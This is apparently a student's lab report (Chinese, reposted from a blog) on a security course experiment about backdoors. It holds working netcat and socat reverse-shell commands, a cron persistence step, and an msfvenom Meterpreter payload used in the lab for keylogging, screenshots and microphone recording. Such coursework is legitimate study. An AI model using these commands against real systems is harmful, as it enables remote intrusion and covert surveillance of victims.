• 20145316许心远第二次实验《后门原理与实践》


    20145316许心远第二次实验《后门原理与实践》

    基础问题回答

    1.例举你能想到的一个后门进入到你系统中的可能方式?

    • 从网络上下载来路不明的盗版软件、压缩包,还有一些小视频……

    2.例举你知道的后门如何启动起来(win及linux)的方式?

    • 双击打开。
    • 取得shell后远程直接执行后门这个可执行文件。

    3.Meterpreter有哪些给你映像深刻的功能?

    • 感觉它超级强大……每个功能都很让我印象深刻!开摄像头,看界面,录音频……完全没有任何隐私可言啊。

    4.如何发现自己有系统有没有被安装后门?

    • 如果翻看任务管理器时,机器内存占用非常严重,关掉主要应用程序还是有占用,任务里有并不认识的exe程序,那很有可能就是被安装了后门。

    实验总结与体会

    • 个人感觉这次实践比上次还有趣,尤其是后门被激活后,meterpreter的功能一经展示出来,简直被震惊。如果未开启防火墙,或防火墙不够高级,所谓监听、隐秘偷拍竟然是这么轻而易举的事情。
    • 实验过程总的不难,但也遇到了很气的部分。因为自己的疏忽忘记关防火墙(我以为自己关掉了),导致在win10系统内一直无法激活那个后门程序,后来换了xpattacker靶机也不可以,提示什么“不是win32文件”。总之,很纠结,浪费了两个小时,好在在武钰等同学的提醒和帮助下,找到了问题,攻克后,后面就比较简单了。
    • 因为我是win10系统,本身存在一定的坚固性,所以最后的提权暂时没做出来,准备之后自己再按个虚拟机或者借同学的win7系统完善一下。

    实践过程记录

    windows获得linux的shell

    • 为windows系统安装ncat软件,我安装在了C盘根目录下了。
    • ipconfigifconfig指令分别查看windows主机和kali虚拟机的ip地址。分别为kali:192.168.234.140 windows:172.30.0.152

    • windows下使用以下命令ncat.exe -l -p 5316监听
      kali下使用nc 172.30.0.152 5316 -e /bin/sh反弹连接windows

    • windows获得linux的shell

    linux获得windows的shell

    • linux主机使用nc -l -p 5316命令于5316端口进行监听
    • windows主机使用ncat.exe -e cmd.exe 192.168.234.140 5316命令通过5316端口反弹连接linux主机
    • linux获得windows的shell

    启动cron

    • 在linux终端下使用crontab -e命令修改用户的cron配置,弹出一个vi界面
    • 修改部分如下
    • cron启动成功

    windows利用socat获取kali的shell

    • kali上用socat tcp-listen:5316把cmd绑定到端口5208
    • 同時用socat tcp-l:5316 system:bash,pty,stderr反弹连接
    • windows使用socat readline tcp:192.168.234.140:5316开启监听
    • 成功,用ls检验

    meterpreter获取主机shell

    • linux使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.234.140 LPORT=5316 -f exe >20145316.exe来生成后门程序,然后发送到windows机中。
    • windows输入指令ncat.exe -lv 5316 >20145316.exe
    • linux使用命令ncat -nv 172.30.0.152 5316 < 20145316.exe传送后门程序
    • 在windows主机ncat文件夹下查看是否有后门文件植入
    • 使用msfconsole命令开启msf进行设置
    • 监听开始,在windows双击20145316.exe运行后门程序,实现远程控制

    meterpreter实现特殊功能

    • 查看主机文件夹信息
    • 获取靶机屏幕截屏

    • 记录靶机击键记录
    • 调用靶机麦克风,录制音频文件
    • windows上任务管理器可以看到后门正在运行
  • 相关阅读:
    斐波那契(通项公式)
    数论--欧几里得定理(求最大公约数)
    5790 素数序数(筛素数版)
    数论--筛法求素数
    2491 玉蟾宫
    闭包详解
    ASP.NET 页生命周期概述1
    IIS 7.0 的 ASP.NET 应用程序生命周期概述
    IIS 5.0 和 6.0 的 ASP.NET 应用程序生命周期概述
    WeUI logo专为微信设计的 UI 库 WeUI
  • 原文地址:https://www.cnblogs.com/xxy745214935/p/6557608.html
Copyright © 2020-2023  润新知